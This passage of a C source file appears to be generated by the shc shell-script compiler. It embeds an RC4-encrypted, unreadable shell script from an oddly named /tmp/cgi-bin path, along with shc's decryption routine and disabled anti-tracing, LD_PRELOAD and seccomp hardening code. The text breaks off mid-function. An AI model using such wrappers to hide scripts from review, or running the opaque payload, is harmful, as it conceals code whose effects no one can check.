#if 0
	shc Version 4.0.3, Generic Shell Script Compiler
	GNU GPL Version 3 Md Jahidul Hamid <jahidulhamid@yahoo.com>

	shc -r -f /tmp/cgi-bin/ajsdhada1563axa184dsanj_support/order.sh 
#endif

static  char data [] = 
#define      pswd_z	256
#define      pswd	((&data[8]))
	"\345\203\121\056\062\000\106\273\063\072\272\317\362\357\235\154"
	"\261\355\035\201\140\361\145\017\026\266\173\313\062\051\223\131"
	"\121\357\361\174\215\101\135\301\174\030\220\157\007\055\334\271"
	"\033\372\073\174\353\240\213\001\126\007\315\211\061\141\343\203"
	"\120\324\377\336\026\135\237\223\166\060\002\175\136\336\067\172"
	"\330\163\366\304\023\202\305\152\212\222\363\274\363\326\077\104"
	"\253\076\042\301\233\302\124\021\362\127\217\121\066\307\313\017"
	"\072\301\323\116\104\230\270\317\053\254\213\036\203\312\143\056"
	"\010\206\357\244\110\103\266\073\232\106\214\320\015\127\337\110"
	"\031\262\226\136\113\116\055\166\372\270\225\175\202\370\253\213"
	"\176\232\057\307\336\346\002\171\054\217\111\071\347\051\201\001"
	"\334\027\137\047\146\215\236\140\105\063\336\310\054\211\123\252"
	"\044\203\162\003\151\165\174\225\004\305\317\354\357\121\355\313"
	"\150\114\363\316\332\221\057\037\304\015\350\360\227\074\233\274"
	"\277\016\277\051\203\073\277\210\001\216\164\360\340\142\274\110"
	"\256\257\027\211\100\106\250\005\124\221\366\354\315\222\250\215"
	"\240\147\267\044\243\166\254\244\101\215\144\107\341\366\076\316"
	"\303\320\166\121\161\336\010\225\201\177\102\045\205\144\272\153"
	"\350\014\232\032\014\340\326\116\155\073\226\117\061"
#define      text_z	3554
#define      text	((&data[403]))
	"\245\224\106\027\162\116\254\363\316\357\031\124\124\323\277\074"
	"\337\132\126\354\072\055\073\250\150\322\370\231\247\025\216\114"
	"\251\324\143\034\043\020\017\361\000\050\106\124\374\006\220\334"
	"\140\347\310\232\024\004\103\175\327\073\026\176\121\244\313\373"
	"\170\057\027\234\100\046\216\100\117\324\225\113\332\045\047\072"
	"\015\360\325\042\365\030\237\314\124\266\112\245\132\025\240\323"
	"\105\267\157\205\336\376\127\041\063\176\101\001\227\100\347\207"
	"\321\155\175\365\361\210\152\105\207\140\323\020\212\224\250\314"
	"\254\363\270\152\301\005\143\145\205\214\104\111\242\005\146\051"
	"\172\242\100\317\076\224\236\140\121\212\041\171\124\135\377\250"
	"\273\330\176\150\334\122\370\274\322\312\120\100\114\011\075\110"
	"\004\056\206\066\363\047\075\036\100\256\026\001\060\211\155\123"
	"\141\132\352\236\321\165\220\147\025\015\171\250\120\245\143\346"
	"\070\110\242\130\160\235\007\246\244\027\244\247\157\306\062\166"
	"\365\336\013\150\100\046\337\347\137\242\167\060\366\164\232\024"
	"\325\023\023\221\223\370\211\200\151\353\026\061\140\342\021\010"
	"\145\156\360\345\071\223\361\146\241\137\200\173\262\014\154\306"
	"\231\175\317\333\040\066\176\350\214\171\273\004\215\232\374\047"
	"\323\336\345\065\104\060\124\074\302\102\044\102\210\167\176\167"
	"\173\003\313\236\312\203\227\051\206\212\300\354\344\120\215\036"
	"\367\163\163\376\314\063\265\025\263\041\011\143\275\321\335\207"
	"\272\352\355\312\171\271\303\164\137\004\022\071\211\157\344\144"
	"\012\052\010\244\211\030\246\161\072\106\210\247\226\031\127\274"
	"\244\261\316\206\364\201\270\224\016\377\031\071\070\260\146\177"
	"\334\222\074\163\213\271\053\014\337\147\156\331\104\065\001\265"
	"\153\373\251\215\241\304\043\170\326\223\137\350\023\010\165\246"
	"\203\375\157\204\110\046\366\137\252\151\176\340\124\301\027\213"
	"\065\223\232\135\211\262\224\171\155\363\214\061\113\160\075\103"
	"\043\012\276\052\306\027\370\264\216\363\377\142\146\260\075\177"
	"\176\142\011\315\302\023\003\344\137\223\023\044\075\077\303\370"
	"\363\216\305\210\305\201\215\270\361\366\024\137\226\016\330\312"
	"\346\340\060\034\104\307\202\310\216\025\220\330\331\323\227\242"
	"\101\004\175\001\301\246\136\166\021\073\323\116\063\215\253\112"
	"\271\074\042\322\260\332\243\061\263\265\310\215\063\216\324\171"
	"\075\353\356\150\372\276\335\026\041\157\151\317\273\070\373\353"
	"\215\151\107\165\356\167\307\000\002\122\101\217\147\337\142\027"
	"\265\124\313\062\220\335\377\370\223\226\056\255\343\273\025\206"
	"\123\003\110\241\003\253\266\075\166\363\351\022\055\363\021\324"
	"\274\136\333\220\164\072\055\211\225\332\254\045\332\020\356\125"
	"\224\352\377\154\326\040\031\236\273\232\331\162\076\335\171\301"
	"\201\050\136\135\065\351\062\256\143\066\230\114\022\042\041\046"
	"\037\227\057\133\263\070\014\331\003\161\064\153\033\313\260\347"
	"\031\151\073\060\272\216\111\212\303\146\011\342\043\174\234\267"
	"\215\065\026\206\360\146\062\065\272\171\263\364\301\075\024\113"
	"\327\074\174\233\375\077\250\040\321\143\071\240\122\123\261\036"
	"\210\011\165\177\206\125\004\361\236\337\302\050\115\136\012\127"
	"\166\372\303\072\350\004\020\231\172\212\131\276\102\213\317\000"
	"\255\310\136\355\037\150\075\260\310\301\043\373\023\072\367\277"
	"\245\131\156\136\065\037\344\252\237\120\344\306\225\144\261\167"
	"\333\261\017\214\363\017\301\205\037\035\176\314\311\113\075\265"
	"\247\077\335\071\334\142\153\061\262\071\242\004\075\157\032\201"
	"\331\211\246\153\320\012\335\373\350\061\214\350\157\174\012\256"
	"\262\243\211\240\360\231\335\206\331\164\042\156\354\162\056\312"
	"\317\211\230\214\074\213\344\233\113\230\113\320\262\053\247\071"
	"\370\006\244\337\021\166\333\152\071\110\142\024\056\141\046\005"
	"\370\230\214\060\004\322\001\213\310\172\012\006\376\117\044\103"
	"\102\342\125\303\077\071\075\251\047\237\140\336\232\223\243\054"
	"\042\225\362\050\150\272\334\266\377\164\024\305\102\041\240\244"
	"\216\243\054\343\366\025\003\123\054\151\217\365\256\327\141\027"
	"\327\324\161\037\154\231\174\361\151\272\256\022\275\265\154\053"
	"\170\104\317\361\227\356\057\204\003\375\003\124\073\032\333\263"
	"\342\037\241\112\003\337\371\135\370\135\045\321\376\355\375\336"
	"\207\232\147\366\263\136\046\353\157\371\267\074\174\116\371\031"
	"\027\165\327\205\353\330\205\347\127\253\151\305\147\044\147\152"
	"\276\371\276\256\301\073\362\044\330\011\117\320\061\153\203\206"
	"\262\312\167\254\156\161\003\071\336\012\320\036\116\112\240\123"
	"\017\342\314\041\207\217\201\304\072\047\325\322\242\245\202\334"
	"\056\341\323\235\166\313\331\135\235\034\102\340\333\031\267\304"
	"\231\027\374\137\077\166\275\153\276\044\144\272\150\112\333\342"
	"\225\253\064\303\041\227\163\104\212\271\370\045\367\323\355\116"
	"\000\245\156\044\372\315\275\017\001\050\356\142\146\020\132\002"
	"\077\255\073\317\276\101\264\061\273\203\352\233\222\170\173\145"
	"\077\121\203\277\034\127\056\257\304\056\214\227\037\176\120\344"
	"\241\136\367\141\034\025\226\007\151\223\157\353\212\342\332\352"
	"\314\313\315\156\027\322\021\255\247\277\135\240\147\073\141\175"
	"\233\277\176\346\241\344\333\053\117\255\013\113\003\053\254\124"
	"\014\252\107\170\226\362\125\322\372\125\103\161\303\376\213\370"
	"\061\073\254\206\073\374\121\043\143\232\071\060\224\254\022\067"
	"\003\355\140\114\023\270\001\247\132\146\143\123\221\000\334\270"
	"\315\131\003\126\306\024\076\253\320\007\224\271\042\263\015\122"
	"\040\107\325\223\002\171\050\213\316\005\214\275\011\064\055\121"
	"\071\301\322\144\320\312\223\027\263\355\374\362\040\156\332\177"
	"\253\066\015\315\006\000\316\100\014\100\033\136\240\373\276\226"
	"\004\335\146\172\013\357\320\115\046\100\215\205\343\241\324\063"
	"\052\101\240\305\262\257\207\052\020\167\207\003\211\260\251\072"
	"\203\345\144\132\123\121\160\221\314\374\251\266\352\110\151\217"
	"\213\004\201\353\320\214\350\341\304\234\215\036\251\312\371\152"
	"\052\307\235\362\032\340\247\271\017\023\234\367\026\152\373\331"
	"\020\324\064\357\360\207\013\246\151\177\170\013\323\206\262\124"
	"\165\213\004\202\265\345\112\016\325\354\310\262\341\235\110\262"
	"\250\130\143\364\043\131\347\066\170\135\316\365\177\017\015\246"
	"\306\371\165\150\360\161\074\354\365\040\111\134\126\125\021\155"
	"\226\130\215\223\273\106\107\017\202\216\314\165\052\266\242\017"
	"\120\172\167\055\260\136\002\335\071\354\345\310\037\367\103\057"
	"\231\165\023\047\001\374\354\257\020\367\235\365\005\034\242\316"
	"\353\375\257\234\273\014\363\174\045\271\070\270\220\024\164\140"
	"\113\205\176\266\340\334\213\057\210\206\070\134\355\026\020\224"
	"\130\054\040\106\044\306\176\164\116\146\112\066\262\140\322\123"
	"\077\362\370\273\132\074\127\020\162\221\111\132\343\015\073\073"
	"\074\366\006\276\272\037\232\226\315\144\105\321\207\245\272\004"
	"\106\216\161\025\264\031\350\227\244\123\013\160\042\120\355\247"
	"\112\142\343\047\366\335\340\366\022\167\037\333\113\314\231\131"
	"\245\117\067\176\223\326\200\161\170\024\333\333\032\277\361\061"
	"\006\222\300\375\320\030\234\072\132\151\105\362\223\140\220\320"
	"\122\047\057\337\206\373\121\060\327\167\034\322\101\073\350\003"
	"\064\052\243\260\236\077\021\004\342\213\324\333\342\075\244\303"
	"\057\074\272\104\134\123\345\055\252\022\172\356\176\042\106\107"
	"\064\234\364\166\253\077\372\337\045\105\276\377\334\160\143\351"
	"\262\271\333\135\235\101\014\041\122\166\311\374\300\141\015\322"
	"\042\033\250\344\270\146\374\146\371\331\114\040\036\161\163\374"
	"\134\026\076\035\250\034\063\215\113\171\253\044\123\216\211\244"
	"\157\320\064\136\015\244\233\336\105\251\112\023\024\336\213\012"
	"\135\115\370\125\236\246\031\273\356\055\370\207\271\026\145\260"
	"\267\053\144\071\033\151\373\302\002\265\341\313\325\044\007\165"
	"\113\075\032\377\113\062\314\003\050\056\075\221\167\355\377\334"
	"\004\026\006\257\256\147\344\374\200\272\307\324\023\022\016\175"
	"\275\025\030\336\234\035\146\216\336\346\361\106\070\337\120\020"
	"\065\111\047\073\302\206\121\031\022\350\205\274\104\371\220\345"
	"\131\274\006\367\273\253\176\162\061\251\174\012\051\111\105\010"
	"\035\325\332\156\226\177\372\054\240\277\063\177\022\013\107\143"
	"\033\266\354\134\106\055\032\053\023\200\026\240\215\020\256\231"
	"\102\336\056\020\340\337\006\155\151\130\071\267\316\202\306\245"
	"\011\226\254\306\273\045\201\256\046\110\130\166\142\373\013\114"
	"\071\314\070\370\172\220\057\265\132\054\205\136\204\046\025\264"
	"\317\213\006\030\224\112\137\071\042\165\145\341\352\356\321\165"
	"\137\357\166\222\153\346\067\036\013\234\057\062\301\352\235\040"
	"\027\361\261\320\167\265\231\364\126\303\361\110\312\245\337\154"
	"\233\226\045\214\171\357\014\273\357\260\264\042\264\336\331\376"
	"\340\202\252\236\134\233\075\207\253\216\071\204\137\146\360\025"
	"\304\313\367\140\060\023\052\100\033\245\174\314\111\133\327\037"
	"\105\061\245\072\221\024\125\147\253\345\147\014\173\141\220\361"
	"\037\041\226\024\371\166\265\214\073\315\324\361\173\244\274\122"
	"\123\144\233\177\166\051\131\351\277\272\074\021\371\012\337\061"
	"\076\243\127\251\130\143\074\351\327\342\057\352\155\046\154\036"
	"\004\356\306\045\142\074\267\265\362\014\071\033\247\315\364\276"
	"\173\152\027\367\113\251\340\341\207\054\045\120\362\327\102\017"
	"\214\273\175\101\335\040\303\326\321\047\310\000\073\335\011\360"
	"\075\013\305\063\141\351\304\036\010\251\132\223\064\075\205\272"
	"\335\035\022\062\300\317\003\321\011\372\055\041\004\155\255\106"
	"\323\070\051\155\064\166\151\327\334\173\343\263\254\070\275\321"
	"\364\317\243\361\230\310\322\040\311\003\152\005\046\243\223\273"
	"\346\142\301\323\230\001\054\113\341\366\041\066\231\044\345\140"
	"\002\252\155\005\176\011\204\226\155\125\214\115\374\057\221\050"
	"\320\155\156\126\151\315\122\326\332\076\066\305\055\060\074\041"
	"\372\213\155\256\311\142\174\006\170\240\077\164\174\314\216\225"
	"\330\333\260\320\224\320\032\031\023\371\210\243\236\061\114\021"
	"\352\171\112\326\036\375\157\227\170\050\255\301\336\322\036\234"
	"\262\023\206\364\257\303\162\114\174\250\010\377\213\117\312\320"
	"\165\055\252\163\126\371\202\063\367\153\163\222\234\111\155\140"
	"\123\204\121\326\357\314\320\173\310\246\365\367\332\367\033\372"
	"\060\230\027\135\174\247\045\064\250\344\244\274\375\075\242\020"
	"\024\167\060\170\120\360\047\032\011\027\277\216\137\363\036\143"
	"\264\155\016\341\126\151\151\320\072\331\021\376\032\025\074\330"
	"\136\216\005\365\146\222\260\151\217\336\101\051\204\146\163\177"
	"\260\210\334\351\175\100\121\311\077\163\342\223\270\077\175\274"
	"\367\000\231\230\110\342\177\152\202\054\321\131\222\315\064\262"
	"\106\345\334\353\047\044\257\312\330\314\164\035\272\260\250\125"
	"\021\126\164\261\247\255\377\320\355\001\254\121\010\026\203\363"
	"\067\260\064\203\213\345\146\023\154\005\167\241\334\221\050\224"
	"\233\175\037\322\004\206\104\237\345\351\046\351\077\350\212\267"
	"\143\160\142\321\200\244\170\101\222\215\271\217\313\251\351\016"
	"\060\163\356\272\153\366\110\326\040\325\123\237\011\122\130\004"
	"\010\167\111\343\336\207\032\246\101\326\045\105\206\113\320\027"
	"\226\103\204\243\114\266\143\144\157\033\150\165\205\057\144\341"
	"\034\355\162\127\124\045\157\301\021\373\164\266\110\104\360\347"
	"\202\033\354\225\344\215\225\065\017\172\374\211\034\177\022\320"
	"\356\233\213\260\350\272\335\245\122\112\163\336\071\313\351\070"
	"\356\171\230\215\072\260\356\073\306\116\250\011\177\344\135\363"
	"\131\363\222\074\014\372\160\361\046\032\377\050\206\032\104\174"
	"\020\140\334\013\343\173\164\243\352\245\027\163\324\242\017\043"
	"\247\264\312\373\340\247\003\326\312\162\225\103\233\112\366\253"
	"\102\173\377\073\053\373\146\152\351\347\177\326\256\367\375\222"
	"\037\271\267\322\315\121\323\300\071\133\351\154\173\074\232\202"
	"\324\233\020\037\241\225\301\054\153\221\304\341\012\362\322\351"
	"\041\321\332\315\223\126\245\211\052\145\060\320\376\242\302\236"
	"\220\036\125\036\240\352\270\111\050\332\154\153\107\370\323\072"
	"\246\034\217\103\321\371\335\233\107\357\325\254\034\041\256\266"
	"\123\242\166\023\074\050\337\262\067\253\125\354\040\106\346\162"
	"\207\330\323\022\164\125\170\102\142\062\252\227\075\224\200\001"
	"\134\257\372\141\000\035\272\215\125\135\365\132\076\014\004\003"
	"\171\236\172\333\377\001\327\152\170\074\331\352\273\371\247\252"
	"\175\013\224\374\362\312\353\315\176\273\167\115\050\027\315\156"
	"\016\134\142\072\245\231\174\215\274\237\331\060\220\067\215\331"
	"\066\343\303\220\320\162\270\173\050\244\165\223\274\313\103\045"
	"\310\171\023\122\236\264\147\255\061\122\100\027\175\216\173\271"
	"\213\110\314\241\072\247\252\122\045\075\153\307\152\225\301\005"
	"\231\255\257\104\103\151\004\175\077\315\374\102\001\173\136\220"
	"\274\222\274\311\006\247\051\366\077\313\271\311\022\145\377\333"
	"\123\312\371\164\241\151\366\321\362\207\133\347\142\310\167\251"
	"\062\210\224\035\203\145\147\042\247\154\162\253\234\166\372\204"
	"\073\035\030\305\316\102\363\102\000\306\250\044\147\247\374\255"
	"\066\234\347\160\010\105\124\054\305\221\231\240\112\104\232\252"
	"\244\054\011\152\302\145\215\151\206\055\126\074\371\060\212\040"
	"\045\064\044\212\030\277\275\200\016\152\004\123\347\255\236\127"
	"\032\347\047\120\141\137\063\154\123\267\024\146\333\223\166\172"
	"\045\201\367\356\334\100\172\025\003\170\315\175\033\305\133\121"
	"\333\162\050\335\275\225\017\332\124\251\324\351\235\251\131\025"
	"\377\060\044\157\167\044\030\200\315\256\032\311\025\240\137\201"
	"\264\277\015\126\243\300\337\251\336\365\226\004\051\365\222\200"
	"\201\251\371\333\171\040\073\256\104\321\271\362\035\117\307\212"
	"\006\047\075\217\135\172\355\374\240\247\343\062\106\277\122\142"
	"\253\017\336\255\273\017\141\345\276\136\160\370\016\112\237\266"
	"\336\053\024\124\020\047\370\236\254\230\122\263\261\120\162\351"
	"\133\256\317\133\150\335\211\312\370\330\051\347\034\113\073\265"
	"\327\102\364\223\117\137\256\230\363\370\114\113\270\321\113\144"
	"\373\154\342\011\264\201\353\145\163\334\204\206\336\033\011\256"
	"\245\010\355\344\365\304\237\166\301\003\304\237\301\043\225\311"
	"\271\005\155\277\153\077\066\363\356\365\111\307\213\235\233\351"
	"\127\071\211\126\060\152\055\255\252\243\304\276\251\223\140\235"
	"\311\124\020\312\345\125\332\253\017\235\230\350\007\326\175\367"
	"\034\034\134\237\333\040\201\354\176\140\022\126\216\235\325\123"
	"\326\041\112\105\240\343\253\175\271\150\040\235\155\341\202\300"
	"\312\272\006\033\107\270\155\014\057\360\166\357\230\310\322\064"
	"\214\361\072\051\135\140\170\245\102\255\063\107\155\334\032\066"
	"\106\011\135\052\151\375\244\117\145\051\175\066\136\102\142\326"
	"\221\020\225\025\036\364\011\162\331\350\132\121\060\161\236\004"
	"\134\210\006\072\175\250\103\003\306\112\254\017\270\212\174\251"
	"\127\300\125\134\375\041\357\052\157\047\210\157\347\066\376\243"
	"\102\301\160\141\064\320\267\256\346\352\267\027\307\363\342\162"
	"\356\271\124\172\106\373\100\054\266\064\001\341\063\376\176\055"
	"\102\225\330\136\233\364\223\053\206\123\242\042\261\230\145\370"
	"\326\060\056\224\346\114\052\113\325\025\361\134\222\112\260\302"
	"\056\044\310\075\225\051\277\274\224\301\025\135\343\054\121\253"
	"\135\144\344\245\143\306\115\017\001\140\311\213\353\326\050\304"
	"\017\217\305\073\335\047\335\167\173\255\376\004\070\215\123\122"
	"\302\307\027\077\067\242\154\035\003\377\023\025\070\140\360\157"
	"\051\036\354\320\243\166\164\356\111\164\117\245\111\053\211\322"
	"\234\316\371\367\151\175\245\216\326\040\235\373\064\136\110\212"
	"\306\136\105\124\365\240\020\305\305\055\322\132\170\254\200\240"
	"\347\216\220\274\260\205\325\120\121\052\006\234\317\140\262\160"
	"\064\367\050\244\174\006\242\101\063\165\234\254\042\034\114\011"
	"\253\334\306\133\142\234\253\264\306\261\120\226\022\002\006\107"
	"\371\056\354\166\065\217\267\150\004\124\024\046\160\140\057\034"
	"\075\366\167\240\222\043\124\131\325\245\357\350\247\366\057\241"
	"\045\034\027\132\253\317\302\257\043\327\325\224\067\005\260\165"
	"\373\050\025\216\113\151\347\040\017\327\010\267\315\070\130\362"
	"\124\160\114\377\100\017\257\144\346\204\370\036\212\251\223\206"
	"\321\251\025\035\023\374\076\042\324\107\331\241\177\062\224\324"
	"\243\341\324\343\360\203\107\327\010\100\365\223\352\211\031\273"
	"\063\056\331\106\053\027\150\377\136\102\241\336\164\065\263\030"
	"\026\207\373\007\013\103\336\023\204\324\246\156\136\300\052\221"
	"\356\003\327\032\033\100\031\171\202\272\130\367\360\013\017\007"
	"\223\013\016\236\117\355\262\323\301\131\101\037\031\153\261\010"
	"\157\210\042\212\311\073\004\114\366\135\103\347\151\123\356\374"
	"\137\374\233\256\351\115\201\253\246\303\313\277\057\174\307\236"
	"\005\352\051\316\046\056\032\035\213\136\004\365\261\362\361\020"
	"\356\215\276\330\332\100\204\201\003\117\101\063\313\011\322\320"
	"\363\374\237\032\052\271\067\266\027\073\253\311\055\235\332\034"
	"\052\231\365\005\331\171\207\335\310\311\020\224\322\343\145\306"
	"\337\004\340\011\276\027\300\326\123\153\237\200\011\171\235\064"
	"\023\222\072\354\013\302\312\324\213\333\150\136\276\316\044\235"
	"\322\005\247\220\035\147\147\160\323\006\361\335\200\216\022\224"
	"\041\114\200\055\016\113\001\231\046\152\367\345\070\034\202\013"
	"\042\052\234\077\222\003\257\146\012\241\104\213\057\126\037\121"
	"\242\240\176\261\353\200\112\022\352\102\367\043\137\172\056\201"
	"\244\313\300\067\316\160\235\331\021\341\144\101\067\203\222\332"
	"\044\020\213\017\220\326\041\173\031\030\237\170\222\316\371\067"
	"\231\272\156\147\052\014\100\074\356\245\175\046\051\020\000\115"
	"\040\213\135\261\142\176\055\173\227\314\363\052\232\355\141\064"
	"\247\320\233\322\335\334\017\313\201\215\361\253\235\361\370\276"
	"\175\125\160\337\324\235\132\153\152\116\226\005\073\370\071\343"
	"\310\325\265\246\261\305\161\063\122\142\337\357\124\327\255\322"
	"\055\036\261\001\274\014\155\046\132\003\054\226\373\145\171\304"
	"\072\057\152\354\364\334\040\106\076\377\066\223\327\344\145\004"
	"\002\027\005\276\043\162\345\176\166\021\025\162\166\216\067\261"
	"\275\242\235\262\176\276\370\275\275\056\120\224\022\266\231\024"
	"\315\236\323\361\021\270\160\210\311\205\372\077\023\062\361\321"
	"\324\216\203\122\114\174\017\012\252\140\237\275\026\071\322\344"
	"\327\245\325\351\136\105\162\047\312\155\147\336\237\130\260\164"
	"\347\063\306\064\257\326\076\132\067\336\027\116\027\352\062\357"
	"\217\010\331\355\116\113\025\031\271\174\367\131\325\247\315\274"
	"\333\223\360\213\152\057\345\241\015\375\360\045\347\042\024\167"
	"\052\356\145\170\072\172\221\363\367\211\114\314\061\032\211\014"
	"\255\171\227\030\250\175\272\266\173\252\333\142\315\360\332\370"
	"\336\077\160\031\272\002\015\262\214\131\177\275\164\010\312\042"
	"\201\142\072\051\340\365\340\133\237\273\276\154\253\230\144\212"
	"\330\325\243\223\330\260\105\144\012\304\042\177\315\355\241\116"
	"\117\333\170\057\320\130\212\160\023\110\335\277\341\102\112\271"
	"\030\356\115\360\237\222\125\252\127\170\051\044\145\312\163\264"
	"\246\354\344\166\104\157\347\130\270\305\030\231\007\142\123\037"
	"\120\240\020\360\063\146\232\213\336\303\260\103\215\044\370\063"
	"\020\335\252\124\114\222\255\004\127\305"
#define      msg2_z	19
#define      msg2	((&data[4808]))
	"\361\036\254\375\100\164\030\220\241\306\324\307\263\360\033\120"
	"\275\014\070\251"
#define      tst1_z	22
#define      tst1	((&data[4829]))
	"\217\151\331\136\133\145\100\022\260\017\127\154\074\154\304\015"
	"\351\337\334\133\351\155\063\331\306\365\003"
#define      inlo_z	3
#define      inlo	((&data[4854]))
	"\071\226\276"
#define      msg1_z	65
#define      msg1	((&data[4858]))
	"\046\213\213\006\371\243\261\113\003\362\100\235\135\172\012\106"
	"\150\343\042\314\227\302\120\360\322\235\143\115\007\144\133\051"
	"\213\217\141\213\224\157\173\047\131\351\116\170\150\301\015\202"
	"\337\237\246\115\155\326\070\203\105\241\236\325\207\117\161\041"
	"\046\053\021\210\067\356\063"
#define      chk1_z	22
#define      chk1	((&data[4929]))
	"\071\124\103\245\105\311\124\314\127\040\356\044\112\112\335\076"
	"\346\174\054\045\360\221\107\076\035\376\334"
#define      rlax_z	1
#define      rlax	((&data[4955]))
	"\174"
#define      chk2_z	19
#define      chk2	((&data[4959]))
	"\213\010\047\075\346\377\236\120\355\323\166\127\152\104\104\055"
	"\317\040\216\127\324\107\200"
#define      date_z	1
#define      date	((&data[4979]))
	"\137"
#define      tst2_z	19
#define      tst2	((&data[4982]))
	"\050\242\327\200\303\046\076\014\004\125\063\143\336\037\015\065"
	"\257\331\077\372\251\176\260"
#define      shll_z	10
#define      shll	((&data[5004]))
	"\145\345\352\266\162\222\333\107\227\020\106\247\252"
#define      opts_z	1
#define      opts	((&data[5016]))
	"\065"
#define      xecc_z	15
#define      xecc	((&data[5020]))
	"\303\221\101\314\063\370\251\002\323\346\321\120\164\150\107\055"
	"\307\106\143"
#define      lsto_z	1
#define      lsto	((&data[5036]))
	"\334"/* End of data[] */;
#define      hide_z	4096
#define SETUID 0	/* Define as 1 to call setuid(0) at start of script */
#define DEBUGEXEC	0	/* Define as 1 to debug execvp calls */
#define TRACEABLE	1	/* Define as 1 to enable ptrace the executable */
#define HARDENING	0	/* Define as 1 to disable ptrace/dump the executable */
#define BUSYBOXON	0	/* Define as 1 to enable work with busybox */

#if HARDENING
static const char * shc_x[] = {
"/*",
" * Copyright 2019 - Intika <intika@librefox.org>",
" * Replace ******** with secret read from fd 21",
" * Also change arguments location of sub commands (sh script commands)",
" * gcc -Wall -fpic -shared -o shc_secret.so shc_secret.c -ldl",
" */",
"",
"#define _GNU_SOURCE /* needed to get RTLD_NEXT defined in dlfcn.h */",
"#define PLACEHOLDER \"********\"",
"#include <dlfcn.h>",
"#include <stdlib.h>",
"#include <string.h>",
"#include <unistd.h>",
"#include <stdio.h>",
"#include <signal.h>",
"",
"static char secret[128000]; //max size",
"typedef int (*pfi)(int, char **, char **);",
"static pfi real_main;",
"",
"// copy argv to new location",
"char **copyargs(int argc, char** argv){",
"    char **newargv = malloc((argc+1)*sizeof(*argv));",
"    char *from,*to;",
"    int i,len;",
"",
"    for(i = 0; i<argc; i++){",
"        from = argv[i];",
"        len = strlen(from)+1;",
"        to = malloc(len);",
"        memcpy(to,from,len);",
"        // zap old argv space",
"        memset(from,'\\0',len);",
"        newargv[i] = to;",
"        argv[i] = 0;",
"    }",
"    newargv[argc] = 0;",
"    return newargv;",
"}",
"",
"static int mymain(int argc, char** argv, char** env) {",
"    //fprintf(stderr, \"Inject main argc = %d\\n\", argc);",
"    return real_main(argc, copyargs(argc,argv), env);",
"}",
"",
"int __libc_start_main(int (*main) (int, char**, char**),",
"                      int argc,",
"                      char **argv,",
"                      void (*init) (void),",
"                      void (*fini)(void),",
"                      void (*rtld_fini)(void),",
"                      void (*stack_end)){",
"    static int (*real___libc_start_main)() = NULL;",
"    int n;",
"",
"    if (!real___libc_start_main) {",
"        real___libc_start_main = dlsym(RTLD_NEXT, \"__libc_start_main\");",
"        if (!real___libc_start_main) abort();",
"    }",
"",
"    n = read(21, secret, sizeof(secret));",
"    if (n > 0) {",
"      int i;",
"",
"    if (secret[n - 1] == '\\n') secret[--n] = '\\0';",
"    for (i = 1; i < argc; i++)",
"        if (strcmp(argv[i], PLACEHOLDER) == 0)",
"          argv[i] = secret;",
"    }",
"",
"    real_main = main;",
"",
"    return real___libc_start_main(mymain, argc, argv, init, fini, rtld_fini, stack_end);",
"}",
"",
0};
#endif /* HARDENING */

/* rtc.c */

#include <sys/stat.h>
#include <sys/types.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/* 'Alleged RC4' */

static unsigned char stte[256], indx, jndx, kndx;

/*
 * Reset arc4 stte. 
 */
void stte_0(void)
{
	indx = jndx = kndx = 0;
	do {
		stte[indx] = indx;
	} while (++indx);
}

/*
 * Set key. Can be used more than once. 
 */
void key(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		do {
			tmp = stte[indx];
			kndx += tmp;
			kndx += ptr[(int)indx % len];
			stte[indx] = stte[kndx];
			stte[kndx] = tmp;
		} while (++indx);
		ptr += 256;
		len -= 256;
	}
}

/*
 * Crypt data. 
 */
void arc4(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		indx++;
		tmp = stte[indx];
		jndx += tmp;
		stte[indx] = stte[jndx];
		stte[jndx] = tmp;
		tmp += stte[indx];
		*ptr ^= stte[tmp];
		ptr++;
		len--;
	}
}

/* End of ARC4 */

#if HARDENING

#include <sys/ptrace.h>
#include <sys/wait.h>
#include <signal.h>
#include <sys/prctl.h>
#define PR_SET_PTRACER 0x59616d61

/* Seccomp Sandboxing Init */
#include <stdlib.h>
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/socket.h>

#include <linux/filter.h>
#include <linux/seccomp.h>
#include <linux/audit.h>

#define ArchField offsetof(struct seccomp_data, arch)

#define Allow(syscall) \
    BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, SYS_##syscall, 0, 1), \
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)

struct sock_filter filter[] = {
    /* validate arch */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, ArchField),
    BPF_JUMP( BPF_JMP+BPF_JEQ+BPF_K, AUDIT_ARCH_X86_64, 1, 0),
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),

    /* load syscall */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, offsetof(struct seccomp_data, nr)),

    /* list of allowed syscalls */
    Allow(exit_group),  /* exits a process */
    Allow(brk),         /* for malloc(), inside libc */
    Allow(mmap),        /* also for malloc() */
    Allow(munmap),      /* for free(), inside libc */

    /* and if we don't match above, die */
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
};
struct sock_fprog filterprog = {
    .len = sizeof(filter)/sizeof(filter[0]),
    .filter = filter
};

/* Seccomp Sandboxing - Set up the restricted environment */
void seccomp_hardening() {
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
        perror("Could not start seccomp:");
        exit(1);
    }
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &filterprog) == -1) {
        perror("Could not start seccomp:");
        exit(1);
    }
} 
/* End Seccomp Sandboxing Init */

void shc_x_file() {
    FILE *fp;
    int line = 0;

    if ((fp = fopen("/tmp/shc_x.c", "w")) == NULL ) {exit(1); exit(1);}
    for (line = 0; shc_x[line]; line++)	fprintf(fp, "%s\n", shc_x[line]);
    fflush(fp);fclose(fp);
}

int make() {
	char * cc, * cflags, * ldflags;
    char cmd[4096];

	cc = getenv("CC");
	if (!cc) cc = "cc";

	sprintf(cmd, "%s %s -o %s %s", cc, "-Wall -fpic -shared", "/tmp/shc_x.so", "/tmp/shc_x.c -ldl");
	if (system(cmd)) {remove("/tmp/shc_x.c"); return -1;}
